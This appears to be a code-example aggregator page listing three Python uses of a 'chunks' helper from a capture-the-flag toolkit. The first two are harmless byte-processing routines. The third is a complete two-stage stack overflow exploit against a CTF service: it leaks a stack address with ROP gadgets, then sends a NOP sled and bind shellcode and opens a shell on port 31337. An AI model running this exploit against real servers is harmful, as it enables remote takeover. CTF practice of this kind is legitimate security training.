Python chunks Examples

Programming Language: Python

Namespace/Package Name: ctf

Method/Function: chunks

Examples at hotexamples.com: 3

Python chunks - 3 examples found. These are the top rated real world Python examples of ctf.chunks extracted from open source projects. You can rate examples to help us improve the quality of examples.

Example #1

Show file

File: ex_back2skool.py Project: notclu/ctf

def string_to_int_array(string):
    hex_string = string.encode("hex")

    int_array = []

    for byte in ctf.chunks(hex_string,2*4):
        int_array.append(struct.unpack('i',struct.pack('>i',int(byte, 16)))[0])

    return int_array

Example #2

Show file

File: crypto.py Project: notclu/ctf

def get_most_common_bytes(data, block_size):
    counts = [[0 for i in range(0,256)] for j in range(0,256)]

    for c in ctf.chunks(data, block_size):
        for i,d in enumerate(c):
            val = ord(d)
            counts[i][val] = counts[i][val] + 1

    max_vals = []

    for c in counts:
        max_vals.append(c.index(max(c)))

Example #3

Show file

File: ex_200.py Project: notclu/ctf

def main_2stage():
    s = ctf.connect(HOST,PORT)

    # Password?
    ctf.recv(s)
    ctf.send(s, '\n') # Doesn't matter

    ctf.recv(s)
    
    # Payload
    ctf.send(s, 'A' * 0x208) # Buf
    ctf.send(s, 'B' * 4) # Saved ebp

    ctf.send(s, return_gadget * 4) # Move the sp up
    ctf.send(s, send_gadget)
    ctf.send(s, '\xDE\xAD\xD0\x0D') # just let this process die, we got what we came for
    ctf.send(s, struct.pack('I', 5)) # fd
    # A stack addr is going to be here
    # Then some size (don't care)
    # Then some flags (dont'care)
    ctf.send(s, '\n')    

    # Useless output from program
    ctf.recv(s)

    # Lets see what's on the stack
    stack_data = ctf.recv(s, recv_len=4096)

    # Nice we can see the part of the stack we've been working on

    # Pull out the address of what we just leaked
    chunks = ctf.chunks(stack_data, 4, adv=2)
    for c in chunks:
        if c == '\xDE\xAD\xD0\x0D':
            # adv the generator to the addr
            next(chunks)
            next(chunks)
            next(chunks)
            break


    leaked_addr = struct.unpack('I', next(chunks))[0]
    print("Got addr %X" % leaked_addr)

    bottom_of_original_frame = leaked_addr + 0x1e
    top_of_original_frame = bottom_of_original_frame - 0x150

    print("Bottom of original frame = %X" % bottom_of_original_frame)
    print("Top of original frame = %X" % top_of_original_frame)


    s.close() # This process has probably already died by now

    # Alright lets get some shellcode onto the stack and pop this
    s = ctf.connect(HOST,PORT)

    # Password?
    ctf.recv(s)
    ctf.send(s, '\n') # Doesn't matter

    ctf.recv(s)
    
    # Payload
    nop_sled_size=256 + 128
    
    ctf.send(s, '\x90' * nop_sled_size)
    ctf.send(s, bind_shellcode)
    ctf.send(s, 'A' * (0x208-len(bind_shellcode)-nop_sled_size))
    ctf.send(s, 'B' * 4) # Saved ebp
    ctf.send(s, struct.pack('I', top_of_original_frame)) # Thank you fork!
    ctf.send(s, '\n')
    ctf.shell(HOST, 31337)